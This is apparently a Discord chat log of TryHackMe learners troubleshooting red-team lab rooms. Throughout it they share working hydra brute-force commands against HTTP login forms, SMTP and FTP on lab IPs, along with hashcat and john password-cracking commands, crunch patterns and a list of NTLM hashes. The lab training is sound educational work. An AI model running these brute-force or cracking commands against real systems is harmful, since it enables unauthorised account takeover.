what do you want to know
I need another hint for room Password Attacks, Task 4:
This is my solution, but it's wrong:
crunch 5 5 -t "THM@!" -o tryhackme.txt
Exploiting Active Directory
Task 5 Exploiting AD Users
I recommend introducing some script that automatically picks up the process we need to migrate to.
Someone messed up that process and I can't go any further.
In the list of processes it does not exist, and this is the only process that allows you to perform the task, that is, to use the keylogger.
CANNOT COMPLETE TASK without resetting machine
thx that helped 
Gave +1 Rep to @celest vessel
In the instructions we have written to take over the process C:\Windows\explorer.exe, which is running with the permissions of THMSERVER1.local.
In the attached window, you can see that there is no process running as this user
Red Team Threat Intel Task 7:
Open the provided ATT&CK Navigator layer and identify matched TTPs to the cyber kill chain. Once TTPs are identified, map them to the cyber kill chain in the static site. To complete the challenge, you must submit one technique name per kill chain section.
a bit ambiguous, I can't really solved without checking the hint as a tried with other technique combinations and didn't work ... could someone explain bit further? Thanks in advance!
anyone else having this kinda error on the windows local persistence room???
it is asking you to choose the blue boxes from the navigator page and fill in the answers for the different steps... the correct answers when you click the submit answer button will have a grey line under them instead of a red line
Can anyone help me with the passwords attack room? task 8 and 9 are kicking my butt and i am having trouble creating a username list and getting the attack to actually work
Can you tell us where exactly you are stuck?
no one did! LOL - they want you to order the steps and give you the first two. then another scenario pops up. very confusing wording
oh sure.... you can use a wordlist for both passwords and usernames for task 9
and for task 8 it is kinda straight forward if you know how to use hydra.... and the first question on that is as simple as remembering that some people forget to disable a default account on ftp
if you need more specific answers then that you would need to provide some more info
Something doesn't add up in the Password Attacks room in task 4. The crunch answer input expects crunch 5 5 -t "7 chars" -o tryhackme.txt but the min-max values for the generated passwords in limited to 5
must say its confusing
2 of those chars are " i.e quotes..... so they don't really count
Quotes? where? generate a list containing THM@! i read it as THM[a-z]!
which is 5 chars, am i missing anything?
you surround the "thm@!" with quotes as what you are generating is going to include spaces and therefor be bleghg for terminal stuffs
also that was just an example the real answer uses only symbols and not the a-z thingy
if THM@! is just an example and the answer is only symbols, then the only thing i can come up with is crunch 5 5 -t ,,,^^ -o tryhackme.txt, which will give you three upper case chars and two symbols combination, but that also gives me a wrong answer.
also tried crunch 5 5 -t ",,,^^" and also "THM^^" not the right answers
any nudge to the right direction would be appreciated, i must be missing something simple here
HA! got it
The second one you did there should have been the right answer
yeah, i figured it out! thx
No problem
@royal void i got the first task just fine lol. It's mainly the other questions in task 8. i am confused on the hydra syntax, and having trouble brute forcing that login-get webpage
small hint: ||hydra -l phillips -P clinic.lst 10.10.48.200 http-get-form||
@warped lion ⬆️
if you missed the hint
Keep it up guys , if I get stuck in any room ,hopefully I'll find it here without asking : )
so i figured out the syntax and got that question, thanks
but when i try to brute force smtp, this is what i get: "[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 454 4.7.0 Temporary authentication failure: Connection lost to authentication server"
and this is my syntax: hydra -l pittman -P clinic.lst 10.10.30.14 smtp
and ive tried other ways besides that syntax and still get the same error. Has anyone ran into a similar issue?
@royal void Thank you
Gave +1 Rep to @royal void
the tickets are then rewarded... just check your tickets in the profile page and you will see what you got
you can get duplicates when you already have 3 of the same type
your command is slightly wrong... you need to include the full email address for that ones... i.e pittman@clinic.thmredteam.com
not that shadow knows... better luck in #1017019049181450291 probably.... maybe just maybe #site-bugs could also help
@royal void how did u go about generating the rule based dictionary for that pittman question?
ive been trying john and will generate like 8000 words but i cant get it to save/overwrite the wordlist
john blah blah wordlist and rule --stdout | tee newwordlistthingy
well you are getting there slowly but surely
it is also okay to take a break and come back later
lol, ive tried doing it but the file crashes and gets locked in john.rec
can you follow the instructions in that link and post a screenshot of the error
if you run just john what does it tell you its version is???
1.9.0
nothing about jumbo???
1.9.0-jumbo-1+bleeding-51f7f3dcd
huh
weird then
just do a rm /opt/john/john.rec and try the command again... maybe
be careful with the rm command though
as it can and will sometimes delete files you need
if your path is wrong for example
Thanks for the advice
Gave +1 Rep to @royal void
oh no problem.... took you long enough to reply.... hope it made you solve the question
It helped a lot. now just working on the machine Task. doing the Intro to C2
@royal void is my syntax pretty on point?
yes except shadow defined the rule before the wordlist
but don't think that should affect it a lot
shadow, sometimes I wonder if you are some AI speaking for shadow herself
hehe nah just using third person to refer to themselves like always
well thanks @royal void for your help, i guess ill just wait and see if anyone else can figure it out and try again a different time
Gave +1 Rep to @royal void
or we can do this @warped lion :
that is what it generated for shadow as the wordlist using the best64 rule
Can someone help with Lateral Movement and Pivoting? I've tried connecting through my own vm and the attackbox and cannot get access.
not done that yet so sadly shadow can't help
Trying to break the hashes but get this error Hash '/root/Desktop/Tools/wordlists/hashes.hash': Token length exception. This is the command I am running hashcat --force -a 0 -m 0 /root/Desktop/Tools/wordlists/hashes.hash /root/Desktop/Tools/wordlists/rockyou.txt -r /root/Desktop/combinator.rule
your hashes.hash files hash is incorrect as it is either missing something or has to much of something that should not be there
This is what's in the the hash file aad3b435b51404eeaad3b435b51404ee:c156d5d108721c5626a6a054d6e0943c
aad3b435b51404eeaad3b435b51404ee:7639497cca10a2ee9b87712e3384539d
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
aad3b435b51404eeaad3b435b51404ee:2e2618f266da8867e5664425c1309a5c
do I need the ::: at the end
yeah probably
tell me did we all can get all the prizes or who get first it's his?
Hashdump gave me the answer and I didn't even see it
all that is left is getting the flags
some prizes are in unlimited supply while some are first come first serve
better explained in the tickets room
!docs verify
will the tickets no longer be useful if the voucher is already redeemed by someone
?
if all of the available prizes of that category is gone shadow would assume so
okay!
Hi,
I am at Performing an LDAP Pass-back & connected with my Kali VPN connected, while setup LDAP server, there's no selection on LDAP database (MDB) but it go next options ie "ensure the database is not removed when purged"
And I am unable to connect to LDAP server.
What could be the issue here?
Anyone want join to solve a room together ? Signature Evasion
hmmmm.......in Task 8 im running the brute force attack against the HTTP server and i get the User Pass pair from hydra, but when i use it in the login page in the browser i get login failed error
if I'm taking the -f switch, I'm getting the same 16 passwords for both users. I tried it with the custom list generated from the custom rule and the "clean" list, and both provide the same 16 passwords for both users. non of them work
what am i missing here?
16 user passwords correct means your syntax is wrong
hydra -l [user] -P [path to password list] 10.10.131.145 http-get "/login-get/index.php:username:^USER^&password=^PASS^:S=logout.php" -f
that is the syntax im using
Incorrect passwords show s=logout.php ?
how can you get 16 user passwords when you need to brute force only one account?
exactly
should it not be http-get-form instead of http-get
well, when you try the wrong creds you get Login Failed! message may using F=Login Failed! ?
i get 16 legit passwords, doesn't make sense
Hydra supports both http-form-get and http-get
I'm asking if that's you error message you get from a failed login attempt, that has to be correct also
im getting 16 successful user pass pairs from hydra but none works, not sure what im missing here
how can a user has 16 working passwords?
they dont, your syntax is likely wrong
ah yes, I also see the mistake in the syntax
any pointer on what part of the syntax?
have a look at where you specify username
When you command is wrong hydra shows that, it's a flawed error message, it happens to me too, like the other guy said cross-check what you wrote
That's why i asked ,if that's the message for incorrect login attempts
google is also your friend, hydra can take a bunch of different things for success/failure
ahh i see!
Did you found it already @zealous wind ?
Someone help please, I can't complete this task it keeps loading for a very very long time
Don't use the public ip, use the machineip:443
The website is broken
Sorry port 443
Got this message
try typing : https://10.10.15.223
Https://
Thanks
oh yea i see the error too
We wanted to let him search for it :p
i also tried hardcoding the user instead of ^USER^ didnt work either. but i keep looking
if you setup proxychains you can make the request go to burp & inspect it to make sure it's doing exactly what you want
really handy for troubleshooting tools
Did you read what dix said?
ah he changed his comment
you should not hardcode the ^USER^ part
it is something with username: which is not correct
In the "Windows Privilege Escalation" room, the section about abusing SeBackup/SeRestore privileges is a little bit confusing (at least for me). It says that in order for the exploit to work the user must have the SeBackup/SeRestore privileges...then it shows a screenshot with a result of "whoami /priv" that clearly shows that the current user does NOT have these privileges...
I checked on the machine and despite the user THMBackup being part of the "Backup Operators" group, it does not have these privileges...but the exploit works anyway
is it something to do with the url parms maybe http://10.10.156.124/login-get/index.php?username=user&password=Password
This is the screenshot in the topic. "SeBackupPrivilege" and "SeRestorePrivilege" are both set to "Disabled"
what does it mean?
Ok, got it: if it's listed, the user has that privilege, the "State" column is relevant to the current process only
A little bit of explanation in the topic itself could be useful, in my opinion
will do. I agree, it's not a bug, just a little bit counterintuitive
so for the first user i got the following command: hydra -l phillips -P ./pass.txt 10.10.156.124 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f which works, i got the right pass word.
for the 2nd user burgess u changes the method to http-post-form and the url to "/login-post/index.php" and using the custom list with the custom john rule which is Az"[0-9][0-9]"^[!@#$%^&*()/]
hydra comes up empty here
should be the same other then changing the HTTP method and the uri
Hi! I've started this path and I'm having problems in the room https://tryhackme.com/room/redteamthreatintel with this question: "What signed binary did Carbanak use for defense evasion?"
I've used the ATTACK Navigator and I've also read the Kaspersky report about this APT but the answer I think is, it isn't. Someone could help me?
its a built-in windows binary used to execute code
Thanks for your help @zealous wind. As the ATTACK shows, I've only have one option with this hint but It isn't correct... I don't know if I can tell you my answer
Gave +1 Rep to @zealous wind
I've tried with .exe and without it
think of what windows binaries in C:\Windows\System32 you have that can be used to execute malicious code
I also saw that this APT injects code in another built-in binary, but this isn't the answer neither
Exactly, my two options are in the ATTACK and below this path
Ok, good hint. I also read https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf but I think doesn't have the answer anyway
Can I dm someone to explain me the crunch command task?
Why can't you do it here?
I just do not wanted to spam, I know that were already a lot of talks on this topic
the options are all symbols
omit the -o to see how the output looks like that will also help you out
First of all I did not understand from the task, how the output should look like? Which characters should be in the final output and which are special characters
THM something something
Talking about a room task is not considered spam
I'm setting up armitage in my local machine using the instructions in "Intro to C2" module under section "Setting up a C2 framework"
Lastly, we must initialize the Database so that Metasploit can use it. It's important to note that you cannot be the root user when attempting to initialize the Metasploit Database. On the AttackBox, you must use the Ubuntu user.
This instruction is given in THM but I am unable to start msfdb as normal user as you can see above
What do I do?
Sudo msfdb init
If anyone can DM me about the last part of task 8 I'd appreciate it!
You should include what room you are even talking about
Password attacks.....sorry about that
Doing that room right now, if I'm past task 8 and you haven't gotten an answer until then, I might be able to help
@zealous wind what problem are u facing for that task ?
so for the first user i got the following command: hydra -l phillips -P ./pass.txt 10.10.156.124 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f which works, i got the right pass word.
for the 2nd user burgess u changes the method to http-post-form and the url to "/login-post/index.php" and using the custom list with the custom john rule which is Az"[0-9][0-9]"^[!@#$%^&*()/]
hydra comes back empty
task 8 last question is not using custom rule
u must use single-extra rule from john
sorry but i thought the custom rule == single-extra
what is single-extra rule then>
hm u can say its like a inbuilt wordlist of rules that we can use
so task 6 u learn on how to craft ur own rule
if u run the command to see all the rules, like this:
so when the hint tell me to use "John's Single-Extra Rule", i take it as use john in built rule, not the custom rule which i created.
i also have the habit to double press my tab key to see if i miss out anything and for auto completion, doing so i stumble upon the rules like this
first tab after typing "sin" to see if the rules is valid. If it autocomplete, means its valid.
double tap the tab button and it tells me that i have 2 option to use.
so from there u play around with it and look at the stdout or the file (if u save all ur output to a file) and see what the rules does !
So should be a list which contains words like: THMa!, THMb!, THMc! ?
Or should contain this one: "THM@!". Because is confusing to say what is the command to generate a list of one string. If we say a list that means we have more words.
@latent grotto have u try this ?
https://discordapp.com/channels/521382216299839518/1017053384441868418/1018839545938194473
yea, i ran everything with root privileges
db works fine on msfconsole but it wont connect with teamserver
so i created the clinic.lst then i used john to extend the list john --workdlist=clinic.lst --rules=Single-Extra --stdout > list.txt
whats the command u running on ? @latent grotto
now im using list.txt in hydra
yes
see what happens
Looking through old discussions here on the channel, I found the answer. And is still unclear for me.
||The answer how is in the task is not correct because you need 6 characters, not 5. And why do you need 2 '^' to get the symbol '@' ? Because the ^^ will add 2 symbols for you.||
The whole problem is that I did not understand what should be the final output?
./teamserver <IP> <Password>
@calm gyro the final output should be THM@!
THM@! = 5 characters
^ = means it will run special characters including space
if u include 2 of these ^, means 2 special character will run
THM@! = 3 letters + 2 special characters = 5 characters
Does that make sense to you ?
but the input expects 7 chars that what threw me into a loop initially
Yeah... now all is clear. But the correct pattern as the question says is not ||"THM^^"||, it is ||"THM^^!"||
@calm gyro hm im curious, why the exclaimation mark at the end ?
I don't know this is why I am asking too. This is the correct answer to pass the question
if u include the exclamation mark means is 6 characters
Ok... I have no more words. Anyway, thank you for the help, it really helped me to understand
Gave +1 Rep to @weak ice
hm im not sure why, it work on my kali .
Gave +1 Rep to @potent crest
thanks @weak ice
Gave +1 Rep to @weak ice
What is that?
i remember someone say all the answers to the question have some like regex checking or sort of, now that u mention that way
haven't used reddit lol
So is not counted somewhere?
what msf ver are you using?
thanks! @weak ice and @calm gyro
Gave +1 Rep to @weak ice
did u use this command apt install -y default-jdk
no i didnt
oh i think i how i did it was install armitage thru apt
i didnt clone anyhting
so i didnt clone anything or run any script, just install armitage straight from apt and run it
i see
"What would the syntax you would use to create a rule to produce the following: "S[Word]NN where N is Number and S is a symbol of !@?" password attacks room task 6
i couldn't find the answer
I've been waiting around 20 minutes for the gophish emails to be opened in the Phishing section of red team learning. would you say i probably put something in incorrectly, or has anyone else waited quite a while on it?
@copper talon do this: https://<targetIP>
mine had the data received after less than 2 mins
thanks for the replies, i'll recheck my configurations
maybe you weren't convincing enough
yup, i just had the wrong protocol set in the link. thanks all
Gave +1 Rep to @zenith sonnet
Anyone here able to give me a little help using Detect it Easy in the Windows Internals room?
NEVERMIND, i was trying to read the notepad.exe that is in the DiE folder, instead of the Windows notepad.exe file
Is it normal to get multiples of "red teamer" tickets after you redeem it?
I believe so, also had this yesterday
Yeah it's random what tickets you get, it appears, I've gotten multiples of the Red Teamer ones after unlocking it
Room: Password Attacks
Task: 8
Question: How do I get the flag in the first question?
Upon running hydra -l ftp -P list.txt ftp://10.10.166.77 I have the output as shown. What should I do next?
Assuming it's talking about using some sort of default credentials, I'm lost.
ftp
open
IP
Yeah, but I require a "Name" and a "Password"... that is where I'm lost on.
the question said no brute forcing... so i seem to be missing something in plain sight?
@unkempt hemlock are you familiar with anonymous login for ftp?
now you have given the ultimate tip
Nope :/
I remember on one of the first trainings on Tryhackme, they said google is your friend
Give that a google
I'm really sorry if I seem too lazy, or not looking in the right direction. :(
A lot of times you need to do some additional research as well, also you would be surprised by the amount of stuff you can find on google
like default user and pass for cctv systems (it is just one example)
the same goes for ftp servers, that's why the question is "without brute-forcing", to enforce you to search for it - on google
Thank you so much! :')
Gave +1 Rep to @shadow quartz
I need to get better... much better... perhaps even switch from DuckDuckGo to Google xD
Thank you so much for the help.
well, we all have to learn, the same counts for me
I'll try and get better at researching. :)
did you do the basic cybersecurity training? It is really good
and I have spent more than the hours they say on this training
Yeah, slacked off after my Jr Pentester. Forgot a bunch of fundamentals.
you can always pick it up again
Hello pips !
I don't understand the first question in the signature room evasion :
To the nearest kibibyte, what is the first detected byte?
which value do I need to put ?
It is in byte or kibibyte ?
as I understand the question i need to give the value that I found in byte in kibibytes
Hello, how can I save the output from the custom rule made by John, in a file?
well the --stdout will print the passwords to standard out in the terminal.... from there the default tool to pipe that data to, to make a file is tee... so like john --rules=blah --wordlist=/path/to/wordlist --stdout | tee new-wordlist.txt
Oh thank you. I didn't know about the tee and with > did not work.
Gave +1 Rep to @royal void
tee's manpage ==
NAME
tee - read from standard input and write to standard output and files
i.e. its intended purpose is just for this
Hello, me again. Can somebody help me with this one?
Ah, so hydra will check the correct credentials by response. Yeah, makes sense, let me try
yeah for the http hydra methods it needs something to check for on success or failure to know if it got in or not
@calm gyro don't forget to add the -f after that to tell hydra to stop processing once a user pass pair was found
All my tickets were deleted
It's a bug staff are looking in to it.
Oh! 
I see I do not have any parameter for the error message. Should work fine with :F=?
I got my 3rd ticket to get the $20 swag and then everything was deleted
well either or.... you can use either :F= or :S= for it to know if it failed or succeeded
But I got the t shirt before 
nice..... shadow got a hat
@royal void niceeee
the hat is somewhere in sweden right now so yeah it is getting closer
hydra -l phillips -P clinic.lst 10.10.48.200 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
worked for shadow
of course change the ip
